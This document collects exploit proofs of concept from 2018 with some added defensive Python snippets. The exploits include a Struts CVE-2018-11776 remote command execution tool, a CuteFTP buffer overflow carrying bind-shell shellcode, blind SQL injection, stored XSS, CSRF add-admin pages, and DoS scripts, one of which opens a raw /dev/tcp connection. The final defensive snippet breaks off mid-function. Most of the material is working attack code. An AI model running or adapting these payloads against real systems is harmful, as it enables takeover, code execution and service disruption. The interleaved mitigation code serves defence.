
# Exploit Title: SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-23
# Vendor Homepage: https://www.skype.com/es/home/
# Tested Version: 12.8.487.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python SkypeApp_12.8.487.0.py
# 2.- Open SkypeApp_12.8.487.0.txt and copy content to clipboard
# 3.- Open SkypeApp.exe
# 4.- Paste ClipBoard on "Cuenta de Skype o Microsoft"
# 5.- Siguiente
# 6.- Crashed

#!/usr/bin/env python
 
buffer = "\x41" * 65225
f = open ("SkypeApp_12.8.487.0.txt", "w")
f.write(buffer)
f.close()
            
# Exploit Title: ManageEngine ADManager Plus 6.5.7 - HTML Injection
# Date: 2018-08-21 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.manageengine.com/
# Hardware Link : https://www.manageengine.com/products/ad-manager/
# Software : ZOHO Corp ManageEngine ADManager Plus
# Product Version:  6.5.7
# Vulnerability Type : Code Injection
# Vulnerability : HTML Injection
# CVE : CVE-2018-15608

# ZOHO Corp ManageEngine ADManager Plus 6.5.7 allows HTML Injection on 
# the "AD Delegation" "Help Desk Technicians" screen.

# HTTP Request Header :

Request URL: http://172.16.2.105:8080/ADMPTechnicians.do?methodToCall=listTechnicianRows
Request Method: POST
Status Code: 200 OK
Remote Address: 172.16.2.105:8080
Referrer Policy: no-referrer-when-downgrade
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Content-Length: 301
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=79DE1A7AE1DC5B7D88FCBF02AB425987; JSESSIONIDSSO=19AA1682A937F344D1DCB190B31343FB
Host: 172.16.2.105:8080
Origin: http://172.16.2.105:8080
Referer: http://172.16.2.105:8080/Delegation.do?selectedTab=delegation&selectedTile=technicians
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
X-Requested-With: XMLHttpRequest

# HTTP Response Header :

Content-Length: 3753
Content-Type: text/html;charset=UTF-8
Date: Tue, 14 Aug 2018 10:14:32 GMT
Server: Apache-Coyote/1.1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1

# Query String Parameters :

methodToCall: listTechnicianRows

# Form Data :

params: {"startIndex":1,"range":10,"searchText":"\"><h1>Ismail Tasdelen</h1>","ascending":true,"isNavigation":false,"adminSelected":false,"isNewRange":false,"sortColumn":FULL_NAME,"typeFilters":"","domainFilters":"","viewType":defaultView}
adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2
            
# Exploit Title: WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection
# Google Dork: intext:"/wp-content/plugins/gift-voucher/"
# Date: 2018-08-23
# Exploit Author: Renos Nikolaou
# Software Link: https://wordpress.org/plugins/gift-voucher/
# Vendor Homepage: http://www.codemenschen.at/
# Version: 1.0.5
# Tested on: Windows 10
# CVE: N/A
# Description : The vulnerability allows an attacker to inject SQL commands 
# through the 'template_id' parameter.

# PoC - Blind SQLi :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://domain.com/gift-voucher/
Content-Length: 62
Cookie: PHPSESSID=efa4of1gq42g0nd9nmj8dska50; __stripe_mid=1f8c5bef-b440-4803-bdd5-f0d0ea22007e; __stripe_sid=de547b6b-fa31-46a1-972b-7b3324272a23
Connection: close

action=wpgv_doajax_front_template&template_id=1 and sleep(15)#

Parameter: template_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=wpgv_doajax_front_template&template_id=1 AND 4448=4448
    Vector: AND [INFERENCE]
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
banner:    '5.5.59'
            
# Exploit Title: CuteFTP 5.0 - Buffer Overflow
# Author: Matteo Malvica
# Date: 2018-08-26
# Vendor homepage: www.globalscape.com
# Software: CuteFTP 5.0.4 XP - build 54.8.6.1
# Software Link: http://installer.globalscape.com/pub/cuteftp/archive/english/cuteftp50.exe
# Tested on: Windows XP Professional SP3 English x86

# STEPS:
# 1. The python script will generate an 'exploit.txt' file.
# 2. Start CuteFTP
# 3. In the program menu click "File" > "Site Manager" > "New" and paste the content of
# the exploit file into the 'label' field and provide a dummy IP address.
# 4. Right click on the site name and 'create shortcut'
# 5. Rename the shortcut to whatever name you prefer: this will create an exe that automates exploit loading upon clicking.
# 6. Quit CuteFTP and launch the newly created 'shortcut'.exe
# 7. $ nc [target_ip] 6666
# 8. celebrate moderately

ret="\xD8\xFC\x91\x7C"	#ntdll.dll 7C91FCD8
nops = '\x90'*30

#msfvenom -p windows/shell_bind_tcp LPORT=6666 -b '\x0a\x00\x0d' -f python
sc =  ""
sc += "\xdb\xd8\xb8\xa7\x37\x29\x0e\xd9\x74\x24\xf4\x5b\x33"
sc += "\xc9\xb1\x53\x31\x43\x17\x83\xeb\xfc\x03\xe4\x24\xcb"
sc += "\xfb\x16\xa2\x89\x04\xe6\x33\xee\x8d\x03\x02\x2e\xe9"
sc += "\x40\x35\x9e\x79\x04\xba\x55\x2f\xbc\x49\x1b\xf8\xb3"
sc += "\xfa\x96\xde\xfa\xfb\x8b\x23\x9d\x7f\xd6\x77\x7d\x41"
sc += "\x19\x8a\x7c\x86\x44\x67\x2c\x5f\x02\xda\xc0\xd4\x5e"
sc += "\xe7\x6b\xa6\x4f\x6f\x88\x7f\x71\x5e\x1f\x0b\x28\x40"
sc += "\x9e\xd8\x40\xc9\xb8\x3d\x6c\x83\x33\xf5\x1a\x12\x95"
sc += "\xc7\xe3\xb9\xd8\xe7\x11\xc3\x1d\xcf\xc9\xb6\x57\x33"
sc += "\x77\xc1\xac\x49\xa3\x44\x36\xe9\x20\xfe\x92\x0b\xe4"
sc += "\x99\x51\x07\x41\xed\x3d\x04\x54\x22\x36\x30\xdd\xc5"
sc += "\x98\xb0\xa5\xe1\x3c\x98\x7e\x8b\x65\x44\xd0\xb4\x75"
sc += "\x27\x8d\x10\xfe\xca\xda\x28\x5d\x83\x2f\x01\x5d\x53"
sc += "\x38\x12\x2e\x61\xe7\x88\xb8\xc9\x60\x17\x3f\x2d\x5b"
sc += "\xef\xaf\xd0\x64\x10\xe6\x16\x30\x40\x90\xbf\x39\x0b"
sc += "\x60\x3f\xec\xa6\x68\xe6\x5f\xd5\x95\x58\x30\x59\x35"
sc += "\x31\x5a\x56\x6a\x21\x65\xbc\x03\xca\x98\x3f\x31\x01"
sc += "\x14\xd9\x2f\x05\x70\x71\xc7\xe7\xa7\x4a\x70\x17\x82"
sc += "\xe2\x16\x50\xc4\x35\x19\x61\xc2\x11\x8d\xea\x01\xa6"
sc += "\xac\xec\x0f\x8e\xb9\x7b\xc5\x5f\x88\x1a\xda\x75\x7a"
sc += "\xbe\x49\x12\x7a\xc9\x71\x8d\x2d\x9e\x44\xc4\xbb\x32"
sc += "\xfe\x7e\xd9\xce\x66\xb8\x59\x15\x5b\x47\x60\xd8\xe7"
sc += "\x63\x72\x24\xe7\x2f\x26\xf8\xbe\xf9\x90\xbe\x68\x48"
sc += "\x4a\x69\xc6\x02\x1a\xec\x24\x95\x5c\xf1\x60\x63\x80"
sc += "\x40\xdd\x32\xbf\x6d\x89\xb2\xb8\x93\x29\x3c\x13\x10"
sc += "\x59\x77\x39\x31\xf2\xde\xa8\x03\x9f\xe0\x07\x47\xa6"
sc += "\x62\xad\x38\x5d\x7a\xc4\x3d\x19\x3c\x35\x4c\x32\xa9"
sc += "\x39\xe3\x33\xf8"

buffer = "A" * 520+ ret + nops + sc + "C" * (3572 - len(sc))
payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s recreational bytes..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
            
# Exploit Title: Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-08-24
# Exploit Author: GunEggWang
# Vendor Homepage: https://gleezcms.org/
# Software Link: https://github.com/gleez/cms
# Version: 1.2.0
# CVE : CVE-2018-15845

# Description: 
# There is a CSRF vulnerability that can add an administrator account in 
# Gleez CMS 1.2.0 via admin/users/add. (https://github.com/gleez/cms/issues/800)
# After the administrator has logged in, opening the PoC creates a new admin account without their consent.
# POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://server/admin/users/add?0=" method="POST">
      <input type="hidden" name="_token" value="18eabd0645699b3eec1686301a684392e8a4735a" />
      <input type="hidden" name="_action" value="909998bbc9e60ce40ae378a1055b46f3" />
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="pass" value="test" />
      <input type="hidden" name="nick" value="test" />
      <input type="hidden" name="mail" value="admin@admin.cc" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="roles[admin]" value="Administrative user, has access to everything." />
      <input type="hidden" name="site_url" value="http://server/" />
      <input type="hidden" name="user" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            
# Exploit Title: Firefox 55.0.3 - Denial of Service (PoC)
# Date: 2018-08-26
# Exploit Author: L0RD
# Vendor Homepage: mozilla.org
# Software Link: https://www.mozilla.org/en-US/firefox/55.0.3/releasenotes/
# Version: 55.0.3
# Tested on: Windows 10
# CVE: N/A

# Description :
# An issue was discovered in Firefox 55.0.3: an attacker can create a
# webpage with a JavaScript payload that crashes the user's browser or
# leaves it unresponsive.

# Exploit :

/* We don't need to create any element on the webpage; we just set a body
attribute from our buffer variable. */
<script>
var buffer = "";
for(var i=0;i<0x11170;i++){
for(j=0;j<=0x9C40;j++){
buffer += "\x44";
}
}
document.body.style.backgroundColor = buffer;
</script>
            
# Exploit Title: ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
# Date: 2018-08-21 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.manageengine.com/
# Hardware Link : https://www.manageengine.com/products/ad-manager/
# Software : ZOHO Corp ManageEngine ADManager Plus
# Product Version:  6.5.7
# Vulnerability Type : Cross-site Scripting
# Vulnerability : Stored XSS
# CVE : N/A

# Zoho ManageEngine ADManager Plus 6.5.7 allows XSS on the "Workflow Delegation" "Requesters" screen.

# HTTP Request Header :

Request URL: http://TARGET:8080/ADMPTechnicians.do?methodToCall=listTechnicianRows
Request Method: POST
Status Code: 200 OK
Remote Address: TARGET:8080
Referrer Policy: no-referrer-when-downgrade
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Content-Length: 320
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=3CED862790101335DD0EB05EE42E4972; JSESSIONIDSSO=3E6785DB8D6DFD46D6C729579E68418D
Host: TARGET:8080
Origin: http://TARGET:8080
Referer: http://TARGET:8080/Delegation.do?selectedTab=delegation&selectedTile=technicians
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
X-Requested-With: XMLHttpRequest

# HTTP Response Header :

Content-Length: 3753
Content-Type: text/html;charset=UTF-8
Date: Tue, 14 Aug 2018 10:14:32 GMT
Server: Apache-Coyote/1.1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1

# Query String Parameters :

methodToCall: listTechnicianRows

# Form Data :

params: {"startIndex":1,"range":10,"searchText":"\"><img src=x onerror=alert('TESTER')>","ascending":true,"isNavigation":false,"adminSelected":false,"isNewRange":false,"sortColumn":FULL_NAME,"typeFilters":"","domainFilters":"","viewType":defaultView}
adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2
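Both ManageEngine ADManager Plus entries above echo the searchText value from the params form field back into the technician list without output encoding, and the X-XSS-Protection: 1 header in the captured responses does not close that gap. The Python example below is added here and is not from the advisories or from ManageEngine: it pulls searchText out of the JSON-like params field (not strict JSON, note the bare FULL_NAME and defaultView) and contrasts an unencoded rendering with html.escape-based encoding, using the advisories' own payloads. The render functions and the params sample are constructed stand-ins, not the product's templates.

```python
import html
import re

# Payloads exactly as they appear in the two advisories' searchText field.
HTML_INJECTION_PAYLOAD = '"><h1>Ismail Tasdelen</h1>'
STORED_XSS_PAYLOAD = '"><img src=x onerror=alert(\'TESTER\')>'

# Constructed copy of the decoded 'params' form field from the HTML-injection capture.
# It is JSON-like but not valid JSON (bare FULL_NAME and defaultView), so json.loads fails on it.
SAMPLE_PARAMS = ('{"startIndex":1,"range":10,"searchText":"\\"><h1>Ismail Tasdelen</h1>",'
                 '"ascending":true,"isNavigation":false,"adminSelected":false,"isNewRange":false,'
                 '"sortColumn":FULL_NAME,"typeFilters":"","domainFilters":"","viewType":defaultView}')

SEARCH_TEXT_RE = re.compile(r'"searchText":"((?:[^"\\]|\\.)*)"')
TAG_RE = re.compile(r'<[^>]+>')
MARKUP_RE = re.compile(r'<\s*/?\s*[A-Za-z]')


def extract_search_text(params_field):
    """Return the searchText value from the params field, with JSON escapes undone,
    or None if the field has no searchText."""
    m = SEARCH_TEXT_RE.search(params_field)
    if not m:
        return None
    return m.group(1).replace('\\"', '"').replace('\\\\', '\\')


def looks_like_markup(value):
    """Input-side detector for logging or alerting: True when the value carries a tag start."""
    return bool(MARKUP_RE.search(value))


def render_naive(search_text):
    """Hypothetical stand-in for the vulnerable template: the value is echoed into an
    attribute unencoded, so a leading " closes the attribute and > closes the tag."""
    return '<input type="text" name="searchText" value="%s">' % search_text


def render_hardened(search_text):
    """Same fragment with context-appropriate output encoding: html.escape(quote=True)
    encodes & < > " and ', so the value cannot leave the attribute or open a tag."""
    return '<input type="text" name="searchText" value="%s">' % html.escape(search_text, quote=True)


def injected_tags(fragment):
    """List every tag in the fragment other than the single expected <input>."""
    return [t for t in TAG_RE.findall(fragment) if not t.startswith('<input ')]


if __name__ == "__main__":
    print("searchText:", extract_search_text(SAMPLE_PARAMS))
    for payload in (HTML_INJECTION_PAYLOAD, STORED_XSS_PAYLOAD):
        print("naive    ->", injected_tags(render_naive(payload)))
        print("hardened ->", injected_tags(render_hardened(payload)))
```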
            
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# struts-pwn: Apache Struts CVE-2018-11776 Exploit
# Author:
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
# This code uses a payload from:
# https://github.com/jas502n/St2-057
# *****************************************************

import argparse
import random
import requests
import sys
try:
    from urllib import parse as urlparse
except ImportError:
    import urlparse

# Disable SSL warnings
try:
    import requests.packages.urllib3
    requests.packages.urllib3.disable_warnings()
except Exception:
    pass

if len(sys.argv) <= 1:
    print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')
    print('[*] Struts-PWN - @mazen160')
    print('\n%s -h for help.' % (sys.argv[0]))
    exit(0)


parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
                    dest="url",
                    help="Check a single URL.",
                    action='store')
parser.add_argument("-l", "--list",
                    dest="usedlist",
                    help="Check a list of URLs.",
                    action='store')
parser.add_argument("-c", "--cmd",
                    dest="cmd",
                    help="Command to execute. (Default: 'id')",
                    action='store',
                    default='id')
parser.add_argument("--exploit",
                    dest="do_exploit",
                    help="Exploit.",
                    action='store_true')


args = parser.parse_args()
url = args.url if args.url else None
usedlist = args.usedlist if args.usedlist else None
cmd = args.cmd if args.cmd else None
do_exploit = args.do_exploit if args.do_exploit else None

headers = {
    'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',
    # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
    'Accept': '*/*'
}
timeout = 3


def parse_url(url):
    """
    Parses the URL.
    """

    # url: http://example.com/demo/struts2-showcase/index.action

    url = url.replace('#', '%23')
    url = url.replace(' ', '%20')

    if ('://' not in url):
        url = str("http://") + str(url)
    scheme = urlparse.urlparse(url).scheme

    # Site: http://example.com
    site = scheme + '://' + urlparse.urlparse(url).netloc

    # FilePath: /demo/struts2-showcase/index.action
    file_path = urlparse.urlparse(url).path
    if (file_path == ''):
        file_path = '/'

    # Filename: index.action
    try:
        filename = url.split('/')[-1]
    except IndexError:
        filename = ''

    # File Dir: /demo/struts2-showcase/
    file_dir = file_path.rstrip(filename)
    if (file_dir == ''):
        file_dir = '/'

    return({"site": site,
            "file_dir": file_dir,
            "filename": filename})


def build_injection_inputs(url):
    """
    Builds injection inputs for the check.
    """

    parsed_url = parse_url(url)
    injection_inputs = []
    url_directories = parsed_url["file_dir"].split("/")

    try:
        url_directories.remove("")
    except ValueError:
        pass

    for i in range(len(url_directories)):
        injection_entry = "/".join(url_directories[:i])

        if not injection_entry.startswith("/"):
            injection_entry = "/%s" % (injection_entry)

        if not injection_entry.endswith("/"):
            injection_entry = "%s/" % (injection_entry)

        injection_entry += "{{INJECTION_POINT}}/"  # It will be rendered later with the payload.
        injection_entry += parsed_url["filename"]

        injection_inputs.append(injection_entry)

    return(injection_inputs)


def check(url):
    random_value = int(''.join(random.choice('0123456789') for i in range(2)))
    multiplication_value = random_value * random_value
    injection_points = build_injection_inputs(url)
    parsed_url = parse_url(url)
    print("[%] Checking for CVE-2018-11776")
    print("[*] URL: %s" % (url))
    print("[*] Total of Attempts: (%s)" % (len(injection_points)))
    attempts_counter = 0

    for injection_point in injection_points:
        attempts_counter += 1
        print("[%s/%s]" % (attempts_counter, len(injection_points)))
        testing_url = "%s%s" % (parsed_url["site"], injection_point)
        testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value))
        try:
            resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
        except Exception as e:
            print("EXCEPTION::::--> " + str(e))
            continue
        if "Location" in resp.headers.keys():
            if str(multiplication_value) in resp.headers['Location']:
                print("[*] Status: Vulnerable!")
                return(injection_point)
    print("[*] Status: Not Affected.")
    return(None)


def exploit(url, cmd):
    parsed_url = parse_url(url)

    injection_point = check(url)
    if injection_point is None:
        print("[%] Target is not vulnerable.")
        return(0)
    print("[%] Exploiting...")

    payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd)

    testing_url = "%s%s" % (parsed_url["site"], injection_point)
    testing_url = testing_url.replace("{{INJECTION_POINT}}", payload)

    try:
        resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
    except Exception as e:
        print("EXCEPTION::::--> " + str(e))
        return(1)

    print("[%] Response:")
    print(resp.text)
    return(0)


def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
    if url:
        if not do_exploit:
            check(url)
        else:
            exploit(url, cmd)

    if usedlist:
        URLs_List = []
        try:
            f_file = open(str(usedlist), "r")
            URLs_List = f_file.read().replace("\r", "").split("\n")
            try:
                URLs_List.remove("")
            except ValueError:
                pass
            f_file.close()
        except Exception as e:
            print("Error: There was an error in reading list file.")
            print("Exception: " + str(e))
            exit(1)
        for url in URLs_List:
            if not do_exploit:
                check(url)
            else:
                exploit(url, cmd)

    print("[%] Done.")


if __name__ == "__main__":
    try:
        main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
    except KeyboardInterrupt:
        print("\nKeyboardInterrupt Detected.")
        print("Exiting...")
        exit(0)
            
# Exploit Title: RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-08-21 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link : https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-c4504ex-color-laser-multifunction-printer/_/R-417998
# Software : RICOH Printer
# Product Version:  MP C4504ex
# Vulnerability Type : Code Injection
# Vulnerability : HTML Injection
# CVE : CVE-2018-15884

# A CSRF vulnerability has been discovered in the RICOH MP C4504ex printer.
# Low-privilege users are able to create administrator accounts.

HTTP POST Request :

POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 193
Cookie: risessionid=132072532817225; cookieOnOffChecker=on; wimsesid=103007361
Connection: close

mode=ADDUSER&step=BASE&wimToken=2051165463&entryIndexIn=00007&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1

HTTP Response Request :

GET /success.txt HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Connection: close
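The Gleez CMS and RICOH entries above both succeed with a fixed token baked into the forged request (_token and wimToken), which implies the server accepted a token that was not tied to the victim's session. The Python example below is added here and is not from either vendor: it derives the token from the session id with HMAC, compares it in constant time and rejects cross-origin submissions, then checks the decision against constructed requests. SITE_ORIGIN, the session ids and SERVER_KEY are assumptions; the static _token value is the one from the Gleez PoC above.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# The application's own origin; "https://server" is the placeholder host used in the Gleez PoC above.
SITE_ORIGIN = "https://server"

# Server-side key. Constructed at import time here; a deployment loads it from configuration
# and never embeds it in pages or scripts.
SERVER_KEY = secrets.token_bytes(32)

# The fixed token the Gleez PoC submits; with session binding it is worthless outside the
# session it was minted for.
POC_STATIC_TOKEN = "18eabd0645699b3eec1686301a684392e8a4735a"


def issue_csrf_token(session_id: str) -> str:
    """Bind the anti-CSRF token to the session: HMAC-SHA256(server key, session id).
    Any other session, or a token copied into an attacker's page, fails verification."""
    return hmac.new(SERVER_KEY, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def same_origin(header_value: Optional[str]) -> bool:
    """True only when the Origin (or Referer) header names this site. Browsers send Origin
    on form POSTs, so a request carrying neither header is treated as untrusted (fail closed)."""
    if not header_value:
        return False
    parts = urlsplit(header_value)
    return "%s://%s" % (parts.scheme, parts.netloc) == SITE_ORIGIN


def accept_state_change(session_id: str, form: Dict[str, str],
                        headers: Dict[str, str]) -> Tuple[bool, str]:
    """Gatekeeper for a state-changing POST such as admin/users/add or adrsSetUserWizard.cgi.
    Returns (allowed, reason)."""
    if not same_origin(headers.get("Origin") or headers.get("Referer")):
        return False, "cross-origin or origin-less request"
    submitted = form.get("_token", "")
    expected = issue_csrf_token(session_id)
    # Constant-time comparison: a plain == would leak the expected token byte by byte.
    if not hmac.compare_digest(submitted.encode("utf-8"), expected.encode("utf-8")):
        return False, "token missing or not bound to this session"
    return True, "ok"


def demo() -> Dict[str, Tuple[bool, str]]:
    """Constructed requests: one legitimate first-party post and three forged variants."""
    victim = "sess-victim-0001"  # constructed session id
    good_token = issue_csrf_token(victim)
    return {
        "legit": accept_state_change(
            victim, {"_token": good_token, "name": "test"}, {"Origin": SITE_ORIGIN}),
        "forged_static_token": accept_state_change(
            victim, {"_token": POC_STATIC_TOKEN, "name": "test"}, {"Origin": "https://attacker.example"}),
        "forged_no_origin": accept_state_change(
            victim, {"_token": good_token}, {}),
        "replayed_other_session": accept_state_change(
            victim, {"_token": issue_csrf_token("sess-other-0002")},
            {"Referer": SITE_ORIGIN + "/admin/users/add"}),
    }


if __name__ == "__main__":
    for name, (allowed, reason) in demo().items():
        print("%-24s %s (%s)" % (name, "ALLOW" if allowed else "DENY", reason))
```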
            
# Exploit Title: Libpango 1.40.8 - Denial of Service (PoC)
# Date: 2018-08-06
# Exploit Author: Jeffery M
# Vendor Homepage: https://www.pango.org/
# Software Link: http://ftp.gnome.org/pub/GNOME/sources/pango/1.40/pango-1.40.9.tar.xz
# Version: 1.40.8+
# Tested on: Windows 7, Gentoo
# CVE : CVE-2018-15120

# Patch : https://github.com/GNOME/pango/commit/71aaeaf020340412b8d012fe23a556c0420eda5f

# Description:
# Invalid Unicode sequences, such as 0x2665 0xfe0e 0xfe0f, can trick the
# Emoji iter code into returning an empty segment, which then triggers
# an assertion in the itemizer.

# POC:
# Save the below as irc_com_dump; chmod +x irc_com_dump; connect to an
# irc server with something linked against libpango 1.40.8 or higher
# (e.g. hexchat 2.14.1, which can be obtained on my server:
# http://order.a.whore.website/HexChat%202.14.1%20x86.exe ), then run
# the following:

irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F'

This is a rudimentary example of how this attack can be used.

#!/bin/bash
# Name: irc_com_dump
# Save this script as irc_com_dump
# run as follows on irc.laks.ml or a server of your choice
# irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F'
# When the user receives the message it will trigger the assertion fail.
###
helpfunc ()
{
sed  -nre '/sed/d;/bash/,/###/{1d;s/^# //g;s/###//;p}' $0;

}
if [[ $# -lt 1 ]] || [[ $1 =~ ^-?-h ]] ; then
helpfunc && exit 1
fi


# So we can send unicode without having to do shit.
LC_ALL=en_US.utf8
export LC_ALL


export allargs=("$@")
#test_ping ()
#{
#        if [[ ! -n $PING ]]; then
#       export PING="$(echo $h| awk '/PING/{print "PONG "$2}')";
#       fi;
#}
if [[ -n ${DEBUG} ]] ; then
declare -p allargs
fi

export name=magicrun${RANDOM}
if [[ -n ${NORANDOM} ]] ; then
        export name=magicdebug
fi
run_irc_com ()
{
set -vx
    echo ${allargs[1]}
#    if  ( ( ( [[ ! ${allargs[1]} =~ [a-zA-Z].* ]] || true) && ( [[ ${allargs[1]} =~ [0-9].*[0-9] ]] &&  [[ ! ${allargs[0]}  =~ .*[.].* ]] || true) ) )     ; then
if [[ ! ${allargs[0]}  =~ .*[.].* &&  ${allargs[1]} =~ ^[0-9]+[0-9]?$ && ! ${allargs[1]} =~ .*[a-zA-Z].* || $# -eq 1 ]] ; then
    export COMM="$@";
    else
    export s=$1
    export p=$2
    export COMM="${@:3}"
        if [[ $p =~ .*[a-zA-Z] ]] ; then
                unset s p
                export COMM="${allargs[@]}"
        fi
    fi

    test -z $s||false  && exec 5<> /dev/tcp/irc.laks.ml/6667 || test -n $s && echo s is $s;exec 5<>/dev/tcp/$s/$p
set +vx
    echo -e 'USER '${name}' 8 ''*'' :'${name}'\nNICK '${name}'\n' 1>&5 2>&1 | stdbuf -i0 -o0 cat - 0<&5 > /dev/stdout | while read h; do
        if [[ ! -n $PING ]]; then
            export PING="$(echo $h| awk '/PING/{print "PONG "$2}')";
        fi;
##      test_ping;
echo -e "${PING}\n" 1>&5
        if [[ ! -n $PINGSENT ]] && [[ -n $PING ]] ; then
            export PINGSENT=isentmyping;
        fi;
        if [[ -z $COMMSENT ]] && [[ -n $PINGSENT ]] && [[ -n $PING ]] ; then
echo -e "${COMM}\nQUIT\n" 1>&5 2>&1
fi
        echo "$h" 2>&1;
    done

}

run_irc_com ${allargs[@]} |& sed -ne "/:$name MODE $name :+iwx/,/\x04/p" | sed -e "/:$name MODE $name/d" -e '/^ERROR :Closing/d' | awk -F" $name " '{print $2}'
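The upstream fix for CVE-2018-15120 is the pango commit linked above; a client that receives untrusted text, such as an IRC client, can additionally refuse to hand stacked variation selectors like U+2665 U+FE0E U+FE0F to the renderer. The Python example below is an added defensive workaround, not part of the advisory or of pango or HexChat: it normalizes a string so that a variation selector survives only when it directly follows a character it can apply to, and applies that to the trailing text of a PRIVMSG line. The IRC line is constructed.

```python
import unicodedata

# U+FE0E (text presentation) and U+FE0F (emoji presentation): the selectors the advisory stacks.
VARIATION_SELECTORS = frozenset(("\ufe0e", "\ufe0f"))


def _can_carry_selector(ch: str) -> bool:
    """A selector may only follow a real base character: not another selector and not a
    control or format character (Unicode categories starting with C)."""
    return ch not in VARIATION_SELECTORS and not unicodedata.category(ch).startswith("C")


def normalize_variation_selectors(text: str) -> str:
    """Keep each variation selector only when it directly follows a character it can
    apply to; drop leading, stacked and orphaned ones. The advisory's sequence
    U+2665 U+FE0E U+FE0F therefore becomes U+2665 U+FE0E."""
    out = []
    for ch in text:
        if ch in VARIATION_SELECTORS and (not out or not _can_carry_selector(out[-1])):
            continue
        out.append(ch)
    return "".join(out)


def has_stacked_variation_selectors(text: str) -> bool:
    """Detection-only variant for logging: True when two selectors are adjacent."""
    return any(a in VARIATION_SELECTORS and b in VARIATION_SELECTORS
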